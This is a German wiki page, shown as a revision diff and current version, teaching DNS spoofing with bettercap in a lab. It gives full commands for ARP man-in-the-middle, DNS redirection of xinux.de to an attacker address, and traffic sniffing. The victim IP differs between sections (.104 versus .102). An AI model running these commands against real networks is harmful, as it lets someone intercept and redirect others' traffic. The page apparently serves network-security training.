DNS Spoofing mit bettercap: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „= DNS Spoofing mit bettercap = == Vorbereitung == <pre> # bettercap installieren (Debian/Ubuntu) sudo apt update && sudo apt install bettercap -y </pre> == O…“)
 
 
(Eine dazwischenliegende Version desselben Benutzers wird nicht angezeigt)
Zeile 17: Zeile 17:
 
<pre>
 
<pre>
 
# 1. DNS-Spoofing-Regel erstellen
 
# 1. DNS-Spoofing-Regel erstellen
echo '*.xinux.de 10.0.10.101' | sudo tee -a /usr/local/share/bettercap/caplets/dns-spoof.cap
+
echo 'xinux.de 10.0.10.101' | sudo tee -a /usr/local/share/bettercap/caplets/dns-spoof.cap
  
 
# 2. Bettercap starten (ARP MITM + DNS Spoofing)
 
# 2. Bettercap starten (ARP MITM + DNS Spoofing)
 
sudo bettercap -iface eth0 \
 
sudo bettercap -iface eth0 \
     -eval "set arp.spoof.targets 10.0.10.102; set dns.spoof.domains ~xinux.de; dns.spoof on; arp.spoof on; net.sniff on"
+
     -eval "set arp.spoof.targets 10.0.10.104; set dns.spoof.domains xinux.de; dns.spoof on; arp.spoof on; net.sniff on"
 
</pre>
 
</pre>
  

Aktuelle Version vom 11. Mai 2025, 18:07 Uhr

DNS Spoofing mit bettercap

Vorbereitung

# bettercap installieren (Debian/Ubuntu)
sudo apt update && sudo apt install bettercap -y

Opfer-Überprüfung

# Echte IP der Zieldomain prüfen
host -4 xinux.de
# Erwartete Ausgabe: xinux.de has address 94.130.248.215

Angreifer-Konfiguration

# 1. DNS-Spoofing-Regel erstellen
echo 'xinux.de 10.0.10.101' | sudo tee -a /usr/local/share/bettercap/caplets/dns-spoof.cap

# 2. Bettercap starten (ARP MITM + DNS Spoofing)
sudo bettercap -iface eth0 \
    -eval "set arp.spoof.targets 10.0.10.104; set dns.spoof.domains xinux.de; dns.spoof on; arp.spoof on; net.sniff on"

Alternative mit Caplet

# dns-spoof.cap erstellen
echo -e "set arp.spoof.targets 10.0.10.102\nset dns.spoof.domains ~xinux.de\ndns.spoof on\narp.spoof on\nnet.sniff on" | sudo tee /usr/local/share/bettercap/caplets/dns-spoof.cap

# Ausführen
sudo bettercap -iface eth0 -caplet dns-spoof

Opfer-Test

# Auf dem Opfergerät testen
ping xinux.de
# Erwartete Ausgabe: PING xinux.de (10.0.10.101)...

Parameter-Erklärung

  • ~xinux.de - Fängt alle Subdomains ab (Wildcard)
  • 10.0.10.102 - IP des Opfers
  • 10.0.10.101 - IP des Angreifers
  • -iface eth0 - Netzwerkinterface